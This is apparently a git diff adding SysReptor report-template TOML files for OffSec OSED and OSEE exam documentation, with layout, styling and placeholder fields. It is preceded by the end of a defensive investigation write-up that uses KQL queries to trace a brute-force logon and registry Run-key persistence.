event.code : "4624" and NOT user.name : SYSTEM and NOT user.name : DWM-2
From this query we find the following event entry:
![](/assets/name/image-322213.png)
This shows that the user Peter did a successful logon to APPSRV02 shortly after the suspected brute force attack. The source IP of the logon event was 192.168.67.69 which means its not a local logon, but remotely.
At this point we have a strong suspicion that the account with the username Peter was compromised and a malicious actor obtained access to APPSRV02 coming from the IP address 192.168.67.69. We should escalate this to an incident and contact the user to verify whether this was a legitimate logon.
"""
[[report_preview_data.findings.steps]]
a_step_title = "Persistence"
b_step_details = """
After suspicion of a compromise, additional investigation should be performed. One area is looking for persistence and a common way attackers employ is through the registry.
To try and determine if this happed, we can use the KQL query:
process.name : "reg.exe"
As a result, we find the following event:
![](/assets/name/image-781171.png)
This shows that a registry change was performed. An entry for the Run key was added. The Run registry key is used when a user logs on to the computer and thus is often used for persistence.
In particular we notice that the file C:\\Windows\\System32\\update.exe will be executed when a user logs on to APPSRV02.
We should escalate this to investigate what the file update.exe is.
"""
[[report_preview_data.findings.steps]]
a_step_title = "Summary"
b_step_details = "In this phase we have strong suspicions that a malicious actor performed a brute force attack against APPSRV02 and managed to compromise the user account with the username “Peter”. Additionally, we suspect that persistence was set up through a Run key in the registry to execute the file “C:\\Windows\\System32\\update.exe”."
[[report_preview_data.findings]]
title = "Phase 2"
cvss = "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:H"
id = "8a39146e-3b2c-4d93-b1d7-9f604092fae4"
[[report_preview_data.findings.steps]]
a_step_title = "TODO step title"
b_step_details = "TODO step details"
[[report_preview_data.findings]]
title = "Phase 3"
cvss = "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H"
id = "7d3e1727-5993-44b8-b06c-89e97c3d35c0"
[[report_preview_data.findings.steps]]
a_step_title = "TODO step title"
b_step_details = "TODO step details"
[[report_preview_data.findings]]
title = "Phase 4"
cvss = "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"
id = "489071b1-0a42-47ca-aa31-0b3f7e5260cd"
[[report_preview_data.findings.steps]]
a_step_title = "TODO step title"
b_step_details = "TODO step details"
[[report_preview_data.findings]]
title = "Phase 5"
cvss = "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"
id = "cab9e74f-4735-4665-ad2f-f9a05ca84870"
[[report_preview_data.findings.steps]]
a_step_title = "TODO step title"
b_step_details = "TODO step details"
[[report_preview_data.findings]]
title = "Phase 6"
cvss = "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
id = "cba6456f-02f1-4ce0-9b1e-88f8bca06430"
[[report_preview_data.findings.steps]]
a_step_title = "TODO step title"
b_step_details = "TODO step details"
[[report_preview_data.findings]]
title = "Phase 7"
cvss = "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
id = "9e79526d-1c15-4eaa-8335-490e895053b0"
[[report_preview_data.findings.steps]]
a_step_title = "TODO step title"
b_step_details = "TODO step details"
[[report_preview_data.findings]]
title = "Phase 8"
cvss = "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"
id = "9fb08d0f-f4f7-469c-9423-87bc6e6b25de"
[[report_preview_data.findings.steps]]
a_step_title = "TODO step title"
b_step_details = "TODO step details"
[[report_preview_data.findings]]
title = "Phase 9"
cvss = "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:L/I:N/A:N"
id = "81d6959d-f7e7-4cab-a0e5-484107a4a534"
[[report_preview_data.findings.steps]]
a_step_title = "TODO step title"
b_step_details = "TODO step details"
[[report_preview_data.findings]]
title = "Phase 10"
cvss = "n/a"
id = "2a5fd063-334a-4158-9ff9-a4735f556c51"
[[report_preview_data.findings.steps]]
a_step_title = "TODO step title"
b_step_details = "TODO step details"
[[assets]]
id = "adc2295d-5fe1-419b-a767-f277437ed91f"
name = "LICENSE"
[[assets]]
id = "e84943a8-5de0-47ac-b308-4a5854156b45"
name = "image-916547.png"
[[assets]]
id = "a31b6a77-cf79-4539-8a9a-f49f09c2f109"
name = "image-781171.png"
[[assets]]
id = "5abf3a1c-641f-4742-93bf-5763590d8b5b"
name = "image-152717.png"
[[assets]]
id = "89ea6aec-d546-43a9-9ce2-bb81e5aa6281"
name = "image-322213.png"
[[assets]]
id = "1c12c44d-11f3-4bd4-ad4f-79e6d9e5668c"
name = "image-608270.png"
[[assets]]
id = "b67b4f0a-d754-4bca-909d-376ee1751ab1"
name = "image-127195.png"
[[assets]]
id = "b42f7152-07e4-4614-9786-90a8756fcb59"
name = "image-590869.png"
[[assets]]
id = "b3e1a3b9-1c2e-4449-beb5-1282b40a03fe"
name = "image.png"

21
demo_data/offsec-designs/osed-assets/LICENSE Normal file
View File

@ -0,0 +1,21 @@
MIT License
Copyright (c) 2023 SysReptor Developers
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

604
demo_data/offsec-designs/osed.toml Normal file
View File

@ -0,0 +1,604 @@
format = "projecttypes/v1"
id = "650eba7d-2ae4-4646-9125-fcd597af5809"
name = "OSED Exam Report v1.1"
language = "en-US"
finding_field_order = [
"title",
"proof",
"initial_analysis",
"application_analysis",
"vulnerability_discovery",
"exploit_creation",
"screenshots",
"cvss",
]
report_template = """
<div id="footer" data-sysreptor-generated="page-footer">
<div id="footer-left"><em>CONFIDENTIAL</em></div>
<div id="footer-center">{{ report.title }}</div>
</div>
<div v-if="report.watermark" id="watermark-osid">{{ report.osid }}</div>
<section id="page-cover" data-sysreptor-generated="page-cover">
<div id="page-cover-background" />
<div id="page-cover-title">
<h1>Offensive Security</h1>
<h2>{{ report.title }}</h2>
</div>
<div id="page-cover-student">
<p id="page-cover-osid">
<strong>OSID: {{ report.osid }}</strong><br>
{{ report.mail }}<br>
</p>
<p id="page-cover-meta">
{{ formatDate(report.report_date, 'long') }}<br>
v{{ report.report_version }}
</p>
</div>
</section>
<pagebreak />
<table-of-contents id="toc" v-slot="tocItems">
<h1>Table of Contents</h1>
<ul>
<li v-for="item in tocItems" :class="'toc-level' + item.level">
<ref :to="item.id" />
</li>
</ul>
<pagebreak />
</table-of-contents>
<markdown>
# Offensive Security OSED Exam Documentation {.in-toc.numbered}
The Offensive Security OSED exam documentation contains all efforts that were conducted in order to pass the Offensive Security Exploit Developer exam. This report will be graded from a standpoint of correctness and fullness to all aspects of the exam. The purpose of this report is to ensure that the student has the technical knowledge required to pass the qualifications for the Offensive Security Exploit Developer certification.
## Objective {.in-toc.numbered}
The objective of this exam is to solve three given assignments as described in the control panel. The student is tasked with following a methodical approach in analyzing and solving the assignments. The exam report is meant to be a writeup of the steps taken to solve the assignment, including any analysis performed and code written.
An example page has already been created for you at the latter portions of this document that should give you ample information on what is expected to pass this exam. Use the sample report as a guideline to get you through the reporting, while removing any headlines that are not relevant to a specific assignment.
## Requirements {.in-toc .numbered}
The student will be required to fill out this penetration testing report fully and to include the following sections:
* High-Level summary of assignment solutions.
* Methodology walkthrough and detailed outline of steps taken through analysis and all written code.
* Each finding with included screenshots, walkthrough, sample code or reference.
* Screenshot of proof.txt.
</markdown>
<section>
<h1 id="summary" class="in-toc numbered">High-Level Summary</h1>
<markdown :text="report.highlevel_summary" />
<pagebreak />
</section>
<section>
<h1 id="findings" class="in-toc numbered">Assignments</h1>
<div v-for="finding in findings">
<h2 :id="finding.id" class="in-toc numbered">{{ finding.title }}</h2>
<div v-if="finding.proof">
<h3 class="in-toc numbered">Proof.txt</h3>
<markdown :text="finding.proof" />
</div>
<div v-if="finding.initial_analysis">
<h3 class="in-toc numbered">Initial Analysis</h3>
<markdown :text="finding.initial_analysis" />
</div>
<div v-if="finding.application_analysis">
<h3 class="in-toc numbered" >Application Analysis</h3>
<markdown :text="finding.application_analysis" />
</div>
<div v-if="finding.vulnerability_discovery">
<h3 class="in-toc numbered">Vulnerability Discovery</h3>
<markdown :text="finding.vulnerability_discovery" />
</div>
<div v-if="finding.exploit_creation">
<h3 class="in-toc numbered">Exploit Creation</h3>
<markdown :text="finding.exploit_creation" />
</div>
<div v-if="finding.screenshots">
<h3 class="in-toc numbered">Screenshots</h3>
<markdown :text="finding.screenshots" />
</div>
<pagebreak />
</div>
</section>
<section v-if="report.appendix_sections.length > 0" class="appendix">
<h1 id="appendix" class="in-toc numbered">Appendix</h1>
<div v-for="appendix_section in report.appendix_sections">
<h2 class="in-toc numbered">{{ appendix_section.title }}</h2>
<markdown :text="appendix_section.content" />
</div>
<pagebreak />
</section>
<section>
<div class="end-of-report">
End of Report<br>
</div>
<div class="end-of-report">
This report was rendered<br>
by <a href="https://docs.sysreptor.com/">SysReptor</a> with<br>
<span style="color:red;">&hearts;</span><br>
</div>
</section>
"""
report_styles = """
@import "/assets/global/base.css";
/* Define variables */
:root {
--color-risk-critical: #E83221;
--color-risk-high: #FF9300;
--color-risk-medium: #FFDA00;
--color-risk-low: #4285F5;
--color-risk-info: #00AE51;
--color-cover-page-bg: #3dc6a4;
}
/* Font settings */
html {
font-family: "Noto Sans", sans-serif;
font-size: 10pt;
}
/* Global styles */
@page {
size: A4 portrait;
margin: 35mm 20mm 25mm 20mm;
}
a {
font-style: italic;
text-decoration: none;
color: inherit;
}
pre code {
border: 1px solid black;
padding: 0.2em !important;
}
code {
background-color: rgb(221, 221, 221);
}
th {
background-color: #ABABAB;
font-weight: bold;
}
tr.table-row-link td {
padding: 0;
}
tr.table-row-link td a {
display: block;
padding: 0.3em;
color: inherit;
text-decoration: none;
font-style: inherit;
}
.table-key {
background-color: #ABABAB;
}
/* Classes for risk colors */
.risk-critical { color: var(--color-risk-critical) !important; font-weight: bold; }
.risk-high { color: var(--color-risk-high) !important; font-weight: bold; }
.risk-medium { color: var(--color-risk-medium) !important; font-weight: bold; }
.risk-low { color: var(--color-risk-low) !important; font-weight: bold; }
.risk-info { color: var(--color-risk-info) !important; font-weight: bold; }
.risk-bg-critical { background-color: var(--color-risk-critical) !important; color: white !important; }
.risk-bg-high { background-color: var(--color-risk-high) !important; }
.risk-bg-medium { background-color: var(--color-risk-medium) !important; }
.risk-bg-low { background-color: var(--color-risk-low) !important; }
.risk-bg-info { background-color: var(--color-risk-info) !important; }
/* Helper class for referencing page number */
.ref-page::before {
content: "" !important;
}
.ref-page::after {
content: target-counter(attr(href), page) !important;
}
.ref-page .ref-title {
display: none !important;
}
/* Table in finding chapters */
.finding-heading .table-key {
height: 3em;
width: 10em;
}
.end-of-report {
text-align:center;
font-style:italic;
margin-top:70px;
line-height:1.7;
}
/* #region footer */
@page {
@bottom-left { content: element(footer-left); }
@bottom-center { content: element(footer-center); }
@bottom-right-corner { content: counter(page); }
}
#footer #footer-left { position: running(footer-left); }
#footer #footer-center { position: running(footer-center); }
/* #endregion footer */
/* #region watermark */
#watermark-osid {
position: fixed;
top: 9cm;
left: 1cm;
transform: rotate(-45deg);
font-size: 90pt;
text-transform: uppercase;
opacity: 0.2;
}
/* #endregion watermark */
/* #region page-cover */
@page :first {
/* Footer on the cover page */
@bottom-right-corner {
content: "";
}
@bottom-right {
/* Page number */
content: counter(page);
font-size: 9pt;
color: white
}
@bottom-left {
content: "Confidential";
text-transform: uppercase;
font-style: italic;
color: white;
}
/* Pentest title should not appear on cover page */
@bottom-center {
content: '';
}
}
#page-cover-background{
position: absolute;
margin-top: -35mm;
margin-left: -20mm;
width: 210mm;
height: 297mm;
background-color: var(--color-cover-page-bg);
}
/* Title page elements */
#page-cover-title {
position: absolute;
top: 20mm;
left: 0;
width: 14cm;
color: #ffffff;
}
#page-cover-title h1 {
font-size: 32pt;
}
#page-cover-title h2 {
font-size: 24pt;
}
#page-cover-student {
position: absolute;
top: 11cm;
left: 0;
width: 14cm;
color: #ffffff;
}
#page-cover-osid {
font-size: 14pt;
}
#page-cover-meta {
line-height: 2em;
}
/* #endregion page-cover */
/* #region toc */
#toc li {
list-style: none;
margin: 0;
padding: 0;
}
#toc .ref::before {
padding-right: 0.5em;
}
#toc .ref::after {
content: " " leader(".") " " target-counter(attr(href), page);
}
#toc .toc-level1 {
font-size: 1.5rem;
font-weight: bold;
margin-top: 0.8rem;
}
#toc .toc-level2 {
font-size: 1.2rem;
font-weight: bold;
margin-top: 0.5rem;
margin-left: 2rem;
}
#toc .toc-level3 {
font-size: 1rem;
margin-top: 0.4rem;
margin-left: 4rem;
}
#toc .toc-level4 {
font-size: 1rem;
margin-top: 0;
margin-left: 6rem;
}
/* #endregion toc */
"""
[report_fields]
[report_fields.title]
type = "string"
label = "Title"
origin = "core"
default = "OSED Exam Documentation"
required = true
spellcheck = true
[report_fields.mail]
type = "string"
label = "Mail"
origin = "custom"
default = "student@example.com"
required = true
spellcheck = false
[report_fields.osid]
type = "string"
label = "OSID"
origin = "custom"
default = "XXXXX"
required = true
spellcheck = false
[report_fields.lastname]
type = "string"
label = "Lastname"
origin = "custom"
default = "Doe"
required = true
spellcheck = false
[report_fields.firstname]
type = "string"
label = "Firstname"
origin = "custom"
default = "John"
required = true
spellcheck = false
[report_fields.watermark]
type = "boolean"
label = "Watermark"
origin = "custom"
default = false
[report_fields.report_date]
type = "date"
label = "Report Date"
origin = "custom"
required = true
[report_fields.report_version]
type = "string"
label = "Report Version"
origin = "custom"
default = "1.0"
required = true
spellcheck = false
[report_fields.appendix_sections]
type = "list"
label = "Appendix"
origin = "custom"
required = true
[report_fields.appendix_sections.items]
type = "object"
label = ""
origin = "custom"
[report_fields.appendix_sections.items.properties]
[report_fields.appendix_sections.items.properties.title]
type = "string"
label = "Title"
origin = "custom"
default = "TODO appendix title"
required = true
spellcheck = false
[report_fields.appendix_sections.items.properties.content]
type = "markdown"
label = "Content"
origin = "custom"
default = "TODO This section is placed for any additional items that were not mentioned in the overall report."
required = true
[report_fields.highlevel_summary]
type = "markdown"
label = "High-Level Summary"
origin = "custom"
default = "TODO A brief description of the assignments that were solved, including the overall exploitation steps."
required = true
[[report_sections]]
id = "Student"
label = "Student"
fields = [
"firstname",
"lastname",
"osid",
"mail",
]
[[report_sections]]
id = "other"
label = "Document Control"
fields = [
"title",
"report_date",
"report_version",
"watermark",
]
[[report_sections]]
id = "highlevel_summary"
label = "High-Level Summary"
fields = [
"highlevel_summary",
]
[[report_sections]]
id = "appendix"
label = "Appendix"
fields = [
"appendix_sections",
]
[finding_fields]
[finding_fields.title]
type = "string"
label = "Assignment"
origin = "core"
default = "TODO Assignment Name"
required = true
spellcheck = true
[finding_fields.cvss]
type = "cvss"
label = "CVSS (not required)"
origin = "core"
default = "n/a"
required = false
[finding_fields.proof]
type = "markdown"
label = "Proof.txt"
origin = "custom"
default = "TODO Provide the contents of proof.txt."
required = true
[finding_fields.screenshots]
type = "markdown"
label = "Screenshots"
origin = "custom"
default = """
TODO The exam control panel contains a section available to submit your proof files. The contents of the proof.txt files obtained from your exam machines must be submitted in the control panel be-fore your exam has ended. Note that the control panel will not indicate whether the submitted proof is correct or not.
Each proof.txt found must be shown in a screenshot that includes the contents of the file, as well as the IP address of the target by using ipconfig.
"""
required = true
[finding_fields.exploit_creation]
type = "markdown"
label = "Exploit Creation"
origin = "custom"
default = "TODO Provide a description of steps to create the exploit, this includes how to combine vulnerabilities, how to bypass DEP and how to write any custom shellcode. At the end of this section the full exploit code should be developed while an explanation of each step should be performed."
required = true
[finding_fields.initial_analysis]
type = "markdown"
label = "Initial Analysis"
origin = "custom"
default = "Todo Provide relevant techniques and methods used to perform enumeration of the application, including network ports, security mitigations etc. The steps taken should be reproducible and easy to understand. Include any custom code or references to public tools."
required = true
[finding_fields.application_analysis]
type = "markdown"
label = "Application Analysis"
origin = "custom"
default = """
TODO Provide a description of the analysis performed against the application, this includes both dynamic and static analysis.
The analysis should include any reverse engineering performed to understand network protocols or file formats as well as how the application may be triggered to dispatch available commands.
"""
required = true
[finding_fields.vulnerability_discovery]
type = "markdown"
label = "Vulnerability Discovery"
origin = "custom"
default = """
TODO Provide relevant analysis steps to locate vulnerabilities inside the application, this includes both results from static analysis and dynamic analysis.
As part of the documentation, proof of concept Python3 code must be created and explained that triggers the vulnerabilities. This includes both ASLR bypass and memory corruption vulnerabilities.
Only the steps that ended up working are required.
"""
required = true
[report_preview_data]
[report_preview_data.report]
title = "OSED Exam Documentation"
mail = "student@example.com"
osid = "OS-XXXXX"
watermark = true
report_date = "2022-07-29"
report_version = "1.0"
highlevel_summary = "TODO A brief description of the assignments that were solved, including the overall exploitation steps."
firstname = "John"
lastname = "Doe"
[[report_preview_data.report.appendix_sections]]
title = "Appendix Title"
content = "Appendix content"
[[report_preview_data.findings]]
title = "TODO Assignment X"
cvss = "n/a"
id = "af3d5c20-71ef-4bb2-b7af-155a5c375af1"
proof = "TODO Provide the contents of proof.txt."
screenshots = """
TODO The exam control panel contains a section available to submit your proof files. The contents of the proof.txt files obtained from your exam machines must be submitted in the control panel be-fore your exam has ended. Note that the control panel will not indicate whether the submitted proof is correct or not.
Each proof.txt found must be shown in a screenshot that includes the contents of the file, as well as the IP address of the target by using ipconfig.
"""
exploit_creation = "TODO Provide a description of steps to create the exploit, this includes how to combine vulnerabilities, how to bypass DEP and how to write any custom shellcode. At the end of this section the full exploit code should be developed while an explanation of each step should be performed."
initial_analysis = "Todo Provide relevant techniques and methods used to perform enumeration of the application, including network ports, security mitigations etc. The steps taken should be reproducible and easy to understand. Include any custom code or references to public tools."
application_analysis = """
TODO Provide a description of the analysis performed against the application, this includes both dynamic and static analysis.
The analysis should include any reverse engineering performed to understand network protocols or file formats as well as how the application may be triggered to dispatch available commands.
"""
vulnerability_discovery = """
TODO Provide relevant analysis steps to locate vulnerabilities inside the application, this includes both results from static analysis and dynamic analysis.
As part of the documentation, proof of concept Python3 code must be created and explained that triggers the vulnerabilities. This includes both ASLR bypass and memory corruption vulnerabilities.
Only the steps that ended up working are required.
"""
[[assets]]
id = "eddcfd32-4595-4968-a41e-80f624bbe457"
name = "LICENSE"

21
demo_data/offsec-designs/osee-assets/LICENSE Normal file
View File

@ -0,0 +1,21 @@
MIT License
Copyright (c) 2023 SysReptor Developers
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

532
demo_data/offsec-designs/osee.toml Normal file
View File

@ -0,0 +1,532 @@
format = "projecttypes/v1"
id = "779cbbda-c7b1-4deb-9d21-571b3ac72f6f"
name = "OSEE Exam Report v1.1"
language = "en-US"
finding_field_order = [
"title",
"proof",
"ropchain",
"poc",
"screenshots",
"steps",
"cvss",
]
report_template = """
<div id="footer" data-sysreptor-generated="page-footer">
<div id="footer-left"><em>CONFIDENTIAL</em></div>
<div id="footer-center">{{ report.title }}</div>
</div>
<div v-if="report.watermark" id="watermark-osid">{{ report.osid }}</div>
<section id="page-cover" data-sysreptor-generated="page-cover">
<div id="page-cover-background" />
<div id="page-cover-title">
<h1>Offensive Security</h1>
<h2>{{ report.title }}</h2>
</div>
<div id="page-cover-student">
<p id="page-cover-osid">
<strong>OSID: {{ report.osid }}</strong><br>
{{ report.mail }}<br>
</p>
<p id="page-cover-meta">
{{ formatDate(report.report_date, 'long') }}<br>
v{{ report.report_version }}
</p>
</div>
</section>
<pagebreak />
<table-of-contents id="toc" v-slot="tocItems">
<h1>Table of Contents</h1>
<ul>
<li v-for="item in tocItems" :class="'toc-level' + item.level">
<ref :to="item.id" />
</li>
</ul>
<pagebreak />
</table-of-contents>
<markdown>
# Offensive Security OSEE Exam Documentation {.in-toc.numbered}
The Offensive Security OSEE exam documentation contains all efforts that were conducted in order to pass the Offensive Security Exploitation Expert exam. This report will be graded from a standpoint of correctness and fullness to all aspects of the exam. The purpose of this report is to ensure that the student has the technical knowledge required to pass the qualifications for the Offensive Security Exploitation Expert certification.
The student will be required to fill out this exam documentation fully and to include the following sections:
* Methodology walkthrough and detailed outline of steps taken.
* Each finding with included screenshots, walkthrough, sample code, and proof.txt if applicable.
* Each finding with included screenshots, walkthrough, sample code, and proof.txt if ap-plicable.
* Any additional items that were not included.
</markdown>
<pagebreak/>
<section>
<h1 id="findings" class="in-toc numbered">Findings</h1>
<div v-for="finding in findings">
<h2 :id="finding.id" class="in-toc numbered">{{ finding.title }}</h2>
<div v-if="finding.proof">
<h3 class="in-toc numbered">Local.txt/Proof.txt</h3>
<markdown :text="finding.proof" />
</div>
<div v-for="vulnerability in finding.vulnerabilities">
<h3 class="in-toc numbered">{{ vulnerability.reference}}</h3>
<markdown :text="vulnerability.details" />
</div>
<div v-if="finding.poc">
<h3 class="in-toc numbered" >PoC Code</h3>
<markdown :text="finding.poc" />
</div>
<div v-if="finding.screenshots">
<h3 class="in-toc numbered">Screenshots</h3>
<markdown :text="finding.screenshots" />
</div>
<div v-if="finding.steps">
<h3 class="in-toc numbered">Steps</h3>
<markdown :text="finding.steps" />
</div>
<pagebreak />
</div>
</section>
<section v-if="report.appendix_sections.length > 0" class="appendix">
<h1 id="appendix" class="in-toc numbered">Appendix</h1>
<div v-for="appendix_section in report.appendix_sections">
<h2 class="in-toc numbered">{{ appendix_section.title }}</h2>
<markdown :text="appendix_section.content" />
</div>
<pagebreak />
</section>
<section>
<div class="end-of-report">
End of Report<br>
</div>
<div class="end-of-report">
This report was rendered<br>
by <a href="https://docs.sysreptor.com/">SysReptor</a> with<br>
<span style="color:red;">&hearts;</span><br>
</div>
</section>
"""
report_styles = """
@import "/assets/global/base.css";
/* Define variables */
:root {
--color-risk-critical: #E83221;
--color-risk-high: #FF9300;
--color-risk-medium: #FFDA00;
--color-risk-low: #4285F5;
--color-risk-info: #00AE51;
--color-cover-page-bg: #f1c232;
}
/* Font settings */
html {
font-family: "Noto Sans", sans-serif;
font-size: 10pt;
}
/* Global styles */
@page {
size: A4 portrait;
margin: 35mm 20mm 25mm 20mm;
}
a {
font-style: italic;
text-decoration: none;
color: inherit;
}
pre code {
border: 1px solid black;
padding: 0.2em !important;
}
code {
background-color: rgb(221, 221, 221);
}
th {
background-color: #ABABAB;
font-weight: bold;
}
tr.table-row-link td {
padding: 0;
}
tr.table-row-link td a {
display: block;
padding: 0.3em;
color: inherit;
text-decoration: none;
font-style: inherit;
}
.table-key {
background-color: #ABABAB;
}
/* Classes for risk colors */
.risk-critical { color: var(--color-risk-critical) !important; font-weight: bold; }
.risk-high { color: var(--color-risk-high) !important; font-weight: bold; }
.risk-medium { color: var(--color-risk-medium) !important; font-weight: bold; }
.risk-low { color: var(--color-risk-low) !important; font-weight: bold; }
.risk-info { color: var(--color-risk-info) !important; font-weight: bold; }
.risk-bg-critical { background-color: var(--color-risk-critical) !important; color: white !important; }
.risk-bg-high { background-color: var(--color-risk-high) !important; }
.risk-bg-medium { background-color: var(--color-risk-medium) !important; }
.risk-bg-low { background-color: var(--color-risk-low) !important; }
.risk-bg-info { background-color: var(--color-risk-info) !important; }
/* Helper class for referencing page number */
.ref-page::before {
content: "" !important;
}
.ref-page::after {
content: target-counter(attr(href), page) !important;
}
.ref-page .ref-title {
display: none !important;
}
/* Table in finding chapters */
.finding-heading .table-key {
height: 3em;
width: 10em;
}
.end-of-report {
text-align:center;
font-style:italic;
margin-top:70px;
line-height:1.7;
}
/* #region footer */
@page {
@bottom-left { content: element(footer-left); }
@bottom-center { content: element(footer-center); }
@bottom-right-corner { content: counter(page); }
}
#footer #footer-left { position: running(footer-left); }
#footer #footer-center { position: running(footer-center); }
/* #endregion footer */
/* #region watermark */
#watermark-osid {
position: fixed;
top: 9cm;
left: 1cm;
transform: rotate(-45deg);
font-size: 90pt;
text-transform: uppercase;
opacity: 0.2;
}
/* #endregion watermark */
/* #region page-cover */
@page :first {
/* Footer on the cover page */
@bottom-right-corner {
content: "";
}
@bottom-right {
/* Page number */
content: counter(page);
font-size: 9pt;
color: white
}
@bottom-left {
content: "Confidential";
text-transform: uppercase;
font-style: italic;
color: white;
}
/* Pentest title should not appear on cover page */
@bottom-center {
content: '';
}
}
#page-cover-background{
position: absolute;
margin-top: -35mm;
margin-left: -20mm;
width: 210mm;
height: 297mm;
background-color: var(--color-cover-page-bg);
}
/* Title page elements */
#page-cover-title {
position: absolute;
top: 20mm;
left: 0;
width: 14cm;
color: #ffffff;
}
#page-cover-title h1 {
font-size: 32pt;
}
#page-cover-title h2 {
font-size: 24pt;
}
#page-cover-student {
position: absolute;
top: 11cm;
left: 0;
width: 14cm;
color: #ffffff;
}
#page-cover-osid {
font-size: 14pt;
}
#page-cover-meta {
line-height: 2em;
}
/* #endregion page-cover */
/* #region toc */
#toc li {
list-style: none;
margin: 0;
padding: 0;
}
#toc .ref::before {
padding-right: 0.5em;
}
#toc .ref::after {
content: " " leader(".") " " target-counter(attr(href), page);
}
#toc .toc-level1 {
font-size: 1.5rem;
font-weight: bold;
margin-top: 0.8rem;
}
#toc .toc-level2 {
font-size: 1.2rem;
font-weight: bold;
margin-top: 0.5rem;
margin-left: 2rem;
}
#toc .toc-level3 {
font-size: 1rem;
margin-top: 0.4rem;
margin-left: 4rem;
}
#toc .toc-level4 {
font-size: 1rem;
margin-top: 0;
margin-left: 6rem;
}
/* #endregion toc */
"""
[report_fields]
[report_fields.title]
type = "string"
label = "Title"
origin = "core"
default = "OSEE Exam Documentation"
required = true
spellcheck = true
[report_fields.mail]
type = "string"
label = "Mail"
origin = "custom"
default = "student@example.com"
required = true
spellcheck = false
[report_fields.osid]
type = "string"
label = "OSID"
origin = "custom"
default = "XXXXX"
required = true
spellcheck = false
[report_fields.lastname]
type = "string"
label = "Lastname"
origin = "custom"
default = "Doe"
required = true
spellcheck = false
[report_fields.firstname]
type = "string"
label = "Firstname"
origin = "custom"
default = "John"
required = true
spellcheck = false
[report_fields.watermark]
type = "boolean"
label = "Watermark"
origin = "custom"
default = false
[report_fields.report_date]
type = "date"
label = "Report Date"
origin = "custom"
required = true
[report_fields.report_version]
type = "string"
label = "Report Version"
origin = "custom"
default = "1.0"
required = true
spellcheck = false
[report_fields.appendix_sections]
type = "list"
label = "Appendix"
origin = "custom"
required = true
[report_fields.appendix_sections.items]
type = "object"
label = ""
origin = "custom"
[report_fields.appendix_sections.items.properties]
[report_fields.appendix_sections.items.properties.title]
type = "string"
label = "Title"
origin = "custom"
default = "TODO appendix title"
required = true
spellcheck = false
[report_fields.appendix_sections.items.properties.content]
type = "markdown"
label = "Content"
origin = "custom"
default = "TODO This section is placed for any additional items that were not mentioned in the overall report."
required = true
[[report_sections]]
id = "Student"
label = "Student"
fields = [
"firstname",
"lastname",
"osid",
"mail",
]
[[report_sections]]
id = "other"
label = "Document Control"
fields = [
"title",
"report_date",
"report_version",
"watermark",
]
[[report_sections]]
id = "appendix"
label = "Appendix"
fields = [
"appendix_sections",
]
[finding_fields]
[finding_fields.title]
type = "string"
label = "Target"
origin = "core"
default = "TODO Target Name"
required = true
spellcheck = true
[finding_fields.cvss]
type = "cvss"
label = "CVSS (not required)"
origin = "core"
default = "n/a"
required = false
[finding_fields.poc]
type = "markdown"
label = "PoC Code"
origin = "custom"
default = "TODO Provide the final proof of concept code used to gain access to the server."
required = true
[finding_fields.proof]
type = "markdown"
label = "Proof.txt"
origin = "custom"
default = "TODO Provide the contents of proof.txt"
required = true
[finding_fields.steps]
type = "markdown"
label = "Steps"
origin = "custom"
default = "TODO Provide a detailed account of your methodology in creating the exploit. The steps taken should be able to be easily followed and reproducible if necessary. "
required = true
[finding_fields.ropchain]
type = "markdown"
label = "ROP Chain"
origin = "custom"
default = "TODO Provide the ASM ROP chains used in the exploit with a brief explanation for each gadget."
required = true
[finding_fields.screenshots]
type = "markdown"
label = "Screenshots"
origin = "custom"
default = "TODO Provide a screenshot of the ipconfig command and the contents of proof.txt."
required = true
[report_preview_data]
[report_preview_data.report]
title = "OSEE Exam Documentation"
mail = "student@example.com"
osid = "OS-XXXXX"
watermark = true
report_date = "2022-07-29"
report_version = "1.0"
firstname = "John"
lastname = "Doe"
[[report_preview_data.report.appendix_sections]]
title = "Appendix Title"
content = "Appendix content"
[[report_preview_data.findings]]
title = "192.168.X.X "
cvss = "n/a"
